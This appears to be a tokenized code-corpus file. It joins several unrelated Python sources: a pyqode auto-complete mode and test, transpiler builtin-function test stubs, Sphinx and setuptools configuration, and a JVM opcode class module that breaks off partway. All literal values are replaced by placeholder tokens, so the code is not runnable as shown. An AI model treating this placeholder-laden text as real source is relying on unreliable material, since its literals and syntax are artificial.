<EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> from pyqode . qt import QtCore , QtGui <EOL> from pyqode . core . api import TextHelper <EOL> from pyqode . core . api . mode import Mode <EOL> class AutoCompleteMode ( Mode ) : <EOL> """<STR_LIT>""" <EOL> MAPPING = { '<STR_LIT:">' : '<STR_LIT:">' , "<STR_LIT:'>" : "<STR_LIT:'>" , "<STR_LIT:(>" : "<STR_LIT:)>" , "<STR_LIT:{>" : "<STR_LIT:}>" , "<STR_LIT:[>" : "<STR_LIT:]>" } <EOL> SELECTED_QUOTES_FORMATS = { key : '<STR_LIT>' for key in MAPPING . keys ( ) } <EOL> QUOTES_FORMATS = { key : '<STR_LIT:%s>' for key in MAPPING . keys ( ) } <EOL> def __init__ ( self ) : <EOL> super ( AutoCompleteMode , self ) . __init__ ( ) <EOL> self . logger = logging . getLogger ( __name__ ) <EOL> self . _ignore_post = False <EOL> def on_state_changed ( self , state ) : <EOL> if state : <EOL> self . editor . post_key_pressed . connect ( self . _on_post_key_pressed ) <EOL> self . editor . key_pressed . connect ( self . _on_key_pressed ) <EOL> else : <EOL> self . editor . post_key_pressed . disconnect ( self . _on_post_key_pressed ) <EOL> self . editor . key_pressed . disconnect ( self . _on_key_pressed ) <EOL> def _on_post_key_pressed ( self , event ) : <EOL> if not event . isAccepted ( ) and not self . _ignore_post : <EOL> txt = event . text ( ) <EOL> trav = self . editor . textCursor ( ) <EOL> assert isinstance ( trav , QtGui . QTextCursor ) <EOL> trav . movePosition ( trav . Left , trav . MoveAnchor , <NUM_LIT:2> ) <EOL> literal = TextHelper ( self . editor ) . is_comment_or_string ( trav ) <EOL> if not literal : <EOL> next_char = TextHelper ( self . editor ) . get_right_character ( ) <EOL> if txt in self . MAPPING : <EOL> to_insert = self . MAPPING [ txt ] <EOL> if ( not next_char or next_char in self . MAPPING . keys ( ) or <EOL> next_char in self . MAPPING . values ( ) or <EOL> next_char . isspace ( ) ) : <EOL> TextHelper ( self . editor ) . insert_text ( <EOL> self . QUOTES_FORMATS [ txt ] % to_insert ) <EOL> self . 
_ignore_post = False <EOL> def _on_key_pressed ( self , event ) : <EOL> txt = event . text ( ) <EOL> cursor = self . editor . textCursor ( ) <EOL> from pyqode . qt import QtGui <EOL> assert isinstance ( cursor , QtGui . QTextCursor ) <EOL> if cursor . hasSelection ( ) : <EOL> if event . text ( ) in self . MAPPING . keys ( ) : <EOL> first = event . text ( ) <EOL> last = self . MAPPING [ event . text ( ) ] <EOL> cursor . insertText ( <EOL> self . SELECTED_QUOTES_FORMATS [ event . text ( ) ] % ( <EOL> first , cursor . selectedText ( ) , last ) ) <EOL> self . editor . setTextCursor ( cursor ) <EOL> event . accept ( ) <EOL> else : <EOL> self . _ignore_post = True <EOL> return <EOL> next_char = TextHelper ( self . editor ) . get_right_character ( ) <EOL> self . logger . debug ( '<STR_LIT>' , next_char ) <EOL> ignore = False <EOL> if event . key ( ) == QtCore . Qt . Key_Backspace : <EOL> tc = self . editor . textCursor ( ) <EOL> pos = tc . position ( ) <EOL> tc . movePosition ( tc . Left ) <EOL> tc . movePosition ( tc . Right , tc . KeepAnchor ) <EOL> del_char = tc . selectedText ( ) <EOL> if del_char in self . MAPPING and self . MAPPING [ del_char ] == next_char : <EOL> tc . beginEditBlock ( ) <EOL> tc . movePosition ( tc . Right , tc . KeepAnchor ) <EOL> tc . insertText ( '<STR_LIT>' ) <EOL> tc . setPosition ( pos - <NUM_LIT:2> ) <EOL> tc . endEditBlock ( ) <EOL> self . editor . setTextCursor ( tc ) <EOL> ignore = True <EOL> elif txt and next_char == txt and next_char in self . MAPPING : <EOL> ignore = True <EOL> elif event . text ( ) == '<STR_LIT:)>' or event . text ( ) == '<STR_LIT:]>' or event . text ( ) == '<STR_LIT:}>' : <EOL> if next_char == event . text ( ) : <EOL> ignore = True <EOL> if ignore : <EOL> event . accept ( ) <EOL> TextHelper ( self . editor ) . clear_selection ( ) <EOL> TextHelper ( self . editor ) . move_right ( ) </s>
<s> """<STR_LIT>""" <EOL> from . qt import QtStyle <EOL> from . darcula import DarculaStyle <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] </s>
<s> """<STR_LIT>""" </s>
<s> import os <EOL> from pyqode . core . api import TextHelper <EOL> from pyqode . qt import QtCore , QtGui <EOL> from pyqode . qt . QtTest import QTest <EOL> from pyqode . core import modes <EOL> def get_mode ( editor ) : <EOL> return editor . modes . get ( modes . WordClickMode ) <EOL> def test_enabled ( editor ) : <EOL> mode = get_mode ( editor ) <EOL> assert mode . enabled <EOL> mode . enabled = False <EOL> mode . enabled = True <EOL> def test_events ( editor ) : <EOL> mode = get_mode ( editor ) <EOL> mode . _add_decoration ( editor . textCursor ( ) ) <EOL> pt = QtCore . QPoint ( <NUM_LIT:10> , TextHelper ( editor ) . line_pos_from_number ( <NUM_LIT:0> ) ) <EOL> if os . environ [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> QTest . mouseMove ( editor , pt ) <EOL> QTest . mousePress ( editor , QtCore . Qt . LeftButton , <EOL> QtCore . Qt . ControlModifier , pt ) <EOL> QTest . mouseMove ( editor , pt ) <EOL> else : <EOL> editor . mouseMoveEvent ( QtGui . QMouseEvent ( <EOL> QtCore . QEvent . MouseMove , pt , <EOL> QtCore . Qt . RightButton , QtCore . Qt . RightButton , <EOL> QtCore . Qt . ControlModifier ) ) <EOL> editor . mousePressEvent ( QtGui . QMouseEvent ( <EOL> QtCore . QEvent . MouseButtonPress , pt , <EOL> QtCore . Qt . LeftButton , QtCore . Qt . RightButton , QtCore . Qt . NoModifier ) ) <EOL> editor . mouseMoveEvent ( QtGui . QMouseEvent ( <EOL> QtCore . QEvent . MouseMove , pt , <EOL> QtCore . Qt . RightButton , QtCore . Qt . RightButton , <EOL> QtCore . Qt . NoModifier ) ) </s>
<s> from . . utils import TranspileTestCase , BuiltinFunctionTestCase <EOL> class CallableTests ( TranspileTestCase ) : <EOL> pass <EOL> class BuiltinCallableFunctionTests ( BuiltinFunctionTestCase , TranspileTestCase ) : <EOL> functions = [ "<STR_LIT>" ] <EOL> not_implemented = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> from . . utils import TranspileTestCase , BuiltinFunctionTestCase <EOL> class IssubclassTests ( TranspileTestCase ) : <EOL> pass <EOL> class BuiltinIssubclassFunctionTests ( BuiltinFunctionTestCase , TranspileTestCase ) : <EOL> functions = [ "<STR_LIT>" ] <EOL> not_implemented = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> from . . utils import TranspileTestCase , BuiltinFunctionTestCase <EOL> class SuperTests ( TranspileTestCase ) : <EOL> pass <EOL> class BuiltinSuperFunctionTests ( BuiltinFunctionTestCase , TranspileTestCase ) : <EOL> functions = [ "<STR_LIT>" ] <EOL> not_implemented = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> from . . utils import TranspileTestCase <EOL> import unittest <EOL> class ListComprehensionTests ( TranspileTestCase ) : <EOL> def test_syntax ( self ) : <EOL> self . assertCodeExecution ( """<STR_LIT>""" ) <EOL> @ unittest . expectedFailure <EOL> def test_method ( self ) : <EOL> self . assertCodeExecution ( """<STR_LIT>""" ) </s>
<s> import sys , os <EOL> sys . path . insert ( <NUM_LIT:1> , os . path . dirname ( os . path . dirname ( os . path . abspath ( __file__ ) ) ) ) <EOL> import bugjar <EOL> extensions = [ ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT:.>' . join ( str ( n ) for n in bugjar . NUM_VERSION [ : <NUM_LIT:2> ] ) <EOL> release = bugjar . VERSION <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> import sys <EOL> from setuptools import setup <EOL> from duvet import VERSION <EOL> try : <EOL> readme = open ( '<STR_LIT>' ) <EOL> long_description = str ( readme . read ( ) ) <EOL> finally : <EOL> readme . close ( ) <EOL> required_pkgs = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> if sys . version_info < ( <NUM_LIT:2> , <NUM_LIT:7> ) : <EOL> required_pkgs . append ( '<STR_LIT>' ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = VERSION , <EOL> description = '<STR_LIT>' , <EOL> long_description = long_description , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> install_requires = required_pkgs , <EOL> scripts = [ ] , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> } , <EOL> license = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> test_suite = '<STR_LIT>' <EOL> ) </s>
<s> from . . utils import TranspileTestCase , BuiltinFunctionTestCase <EOL> class LenTests ( TranspileTestCase ) : <EOL> pass <EOL> class BuiltinLenFunctionTests ( BuiltinFunctionTestCase , TranspileTestCase ) : <EOL> functions = [ "<STR_LIT>" ] <EOL> not_implemented = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> from . . utils import TranspileTestCase <EOL> class ClassTests ( TranspileTestCase ) : <EOL> def test_minimal ( self ) : <EOL> self . assertCodeExecution ( """<STR_LIT>""" , run_in_function = False ) <EOL> def test_simple ( self ) : <EOL> self . assertCodeExecution ( """<STR_LIT>""" , run_in_function = False ) <EOL> def test_method_override ( self ) : <EOL> self . assertCodeExecution ( """<STR_LIT>""" , run_in_function = False ) <EOL> def test_subclass ( self ) : <EOL> self . assertCodeExecution ( """<STR_LIT>""" ) </s>
<s> from . constants import Classref , Fieldref , Methodref , InterfaceMethodref , String , Integer , Long , Float , Double , Constant <EOL> class Opcode : <EOL> opcodes = None <EOL> def __init__ ( self ) : <EOL> self . references = [ ] <EOL> self . starts_line = None <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , self . __arg_repr__ ( ) ) <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ classmethod <EOL> def read ( cls , reader , dump = None ) : <EOL> code = reader . read_u1 ( ) <EOL> if Opcode . opcodes is None : <EOL> Opcode . opcodes = { } <EOL> for name in globals ( ) : <EOL> klass = globals ( ) [ name ] <EOL> try : <EOL> if name != '<STR_LIT>' and issubclass ( klass , Opcode ) : <EOL> Opcode . opcodes [ klass . code ] = klass <EOL> except TypeError : <EOL> pass <EOL> instance = Opcode . opcodes [ code ] . read_extra ( reader , dump ) <EOL> if dump : <EOL> reader . debug ( "<STR_LIT:U+0020>" * dump , '<STR_LIT>' % ( reader . offset , instance ) ) <EOL> return instance <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> return cls ( ) <EOL> def write ( self , writer ) : <EOL> writer . write_u1 ( self . code ) <EOL> self . write_extra ( writer ) <EOL> def write_extra ( self , writer ) : <EOL> pass <EOL> def resolve ( self , constant_pool ) : <EOL> pass <EOL> @ property <EOL> def stack_effect ( self ) : <EOL> return self . produce_count - self . consume_count <EOL> def process ( self , context ) : <EOL> return True <EOL> class AALOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( AALOAD , self ) . __init__ ( ) <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class AASTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( AASTORE , self ) . 
__init__ ( ) <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:3> <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ACONST_NULL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ACONST_NULL , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ALOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , var ) : <EOL> super ( ALOAD , self ) . __init__ ( ) <EOL> self . var = var <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . var <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> var = reader . read_u1 ( ) <EOL> return cls ( var ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( self . var ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ALOAD_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ALOAD_0 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ALOAD_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ALOAD_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ALOAD_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ALOAD_2 , self ) . 
__init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ALOAD_3 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ALOAD_3 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ANEWARRAY ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name ) : <EOL> super ( ANEWARRAY , self ) . __init__ ( ) <EOL> self . klass = Classref ( class_name ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . klass . name <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> klass = reader . read_u2 ( ) <EOL> return cls ( reader . constant_pool [ klass ] . name . bytes . decode ( '<STR_LIT>' ) ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . klass ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . klass . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ARETURN ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ARETURN , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ARRAYLENGTH ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ARRAYLENGTH , self ) . 
__init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ASTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , var ) : <EOL> super ( ASTORE , self ) . __init__ ( ) <EOL> self . var = var <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . var <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> var = reader . read_u1 ( ) <EOL> return cls ( var ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( self . var ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ASTORE_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ASTORE_0 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ASTORE_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ASTORE_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ASTORE_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ASTORE_2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ASTORE_3 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ASTORE_3 , self ) . 
__init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class ATHROW ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ATHROW , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class BALOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( BALOAD , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:3> <EOL> class BASTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( BASTORE , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:3> <EOL> class BIPUSH ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , const ) : <EOL> super ( BIPUSH , self ) . __init__ ( ) <EOL> self . const = const <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT:U+0020>' + repr ( self . const ) <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> const = reader . read_u1 ( ) <EOL> return cls ( const ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s1 ( self . const ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class BREAKPOINT ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( BREAKPOINT , self ) . __init__ ( ) <EOL> class CALOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( CALOAD , self ) . 
__init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class CASTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( CASTORE , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:3> <EOL> class CHECKCAST ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name ) : <EOL> super ( CHECKCAST , self ) . __init__ ( ) <EOL> self . klass = Classref ( class_name ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . klass ) <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> class_name = reader . constant_pool [ reader . read_u2 ( ) ] . name . bytes . decode ( '<STR_LIT>' ) <EOL> return cls ( class_name ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . klass ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . klass . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class D2F ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( D2F , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class D2I ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( D2I , self ) . 
__init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class D2L ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( D2L , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class DADD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DADD , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class DALOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DALOAD , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class DASTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DASTORE , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:3> <EOL> class DCMPG ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DCMPG , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class DCMPL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DCMPL , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class DCONST_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DCONST_0 , self ) . 
__init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class DCONST_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DCONST_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class DDIV ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DDIV , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class DLOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , var ) : <EOL> super ( DLOAD , self ) . __init__ ( ) <EOL> self . var = var <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . var <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> var = reader . read_u1 ( ) <EOL> return cls ( var ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( self . var ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class DLOAD_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , var ) : <EOL> super ( DLOAD_0 , self ) . __init__ ( ) <EOL> self . var = var <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . var <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> var = reader . read_u1 ( ) <EOL> return cls ( var ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( self . 
var ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class DLOAD_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DLOAD_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class DLOAD_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DLOAD_2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class DLOAD_3 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( DLOAD_3 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> 